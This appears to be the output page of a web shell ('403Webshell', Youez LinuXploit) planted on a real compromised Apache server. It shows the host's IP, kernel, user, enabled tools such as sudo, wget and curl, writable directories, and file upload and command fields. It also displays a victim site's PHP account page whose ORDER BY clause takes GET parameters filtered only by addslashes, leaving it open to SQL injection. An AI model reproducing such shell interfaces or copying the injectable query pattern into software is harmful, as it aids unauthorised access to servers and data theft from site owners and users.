403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.185
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/store.tiacyrusxxx.com/public_html/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/store.tiacyrusxxx.com/public_html/dev/acct_free.php
<?php
include('config.php');
	if ($member_id == 0) {
		printf("<meta http-equiv=\"Refresh\" content=\"0;url=./join.php\">"); 
		die();
	}

dbConn();
$section_header = "My Account : Free Content";
include('mod_html_top.php');
?>
<a href="acct_free.php">Name (A to Z)</a> &bull; <a href="acct_free.php?sort_by=rate&sort_order=DESC">Top Rated</a> &bull; <a href="acct_free.php?sort_by=releasedate&sort_order=DESC">Newest</a>
<br />
<?
	$page_limit = "20";

	if (isset($_GET['sort_by'])) {
		$sort_by = addslashes($_GET['sort_by']);
	} else {
		$sort_by = "`cms_content`.`name`";
	}
	

	if (isset($_GET['sort_order'])) {
		$sort_order = addslashes($_GET['sort_order']); // ASC - DESC
	} else {
		$sort_order = "ASC";
	}
	
	$sort_url = "?sort_by=".$sort_by."&sort_order=".$sort_order."&";
	
	if (isset($_GET['page'])) {
		$page = $_GET['page'];
	} else {
		$page = 1;
	}
	
	$limit_start = $page * $page_limit - $page_limit;
	
$get_total = @mysql_query("SELECT count(*) as count FROM `cms_content_free`
INNER JOIN `cms_content` ON `cms_content`.`content_id` = `cms_content_free`.`content_id`
WHERE `cms_content_free`.`releasedate` BETWEEN '".$_SESSION['dnjoindate']."' AND '".$today."'");
$total_rows = @mysql_result($get_total, 0, 'count');

$total_pages = ceil($total_rows / $page_limit);

if ($total_pages > 1) {
$pagination = pagination("acct_free.php".$sort_url,$page,$total_pages);
} else {
$pagination = "";
}

$query = "SELECT `cms_content`.`content_id`,
`cms_content`.`name`,
`cms_content`.`num_photos`,
`cms_content`.`price`,
(`cms_content`.`rate_total`/`cms_content`.`rate_count`) as rate
FROM `cms_content_free`
INNER JOIN `cms_content` ON `cms_content`.`content_id` = `cms_content_free`.`content_id`
WHERE `cms_content_free`.`releasedate` BETWEEN '".$_SESSION['dnjoindate']."' AND '".$today."'
ORDER BY ".$sort_by." ".$sort_order." LIMIT ".$limit_start.",".$page_limit."";

echo $pagination;
$num_columns = "5";
$content_type = "2";
include('mod_photoset_zip_output.php');
echo $pagination;

include('mod_html_middle.php');

//include('mod_acct_sidemenu.php');
//include('mod_side_new_photosets.php');
//include('mod_side_rate_models.php');
//include('mod_side_rate_photosets.php');

include('mod_html_bottom.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit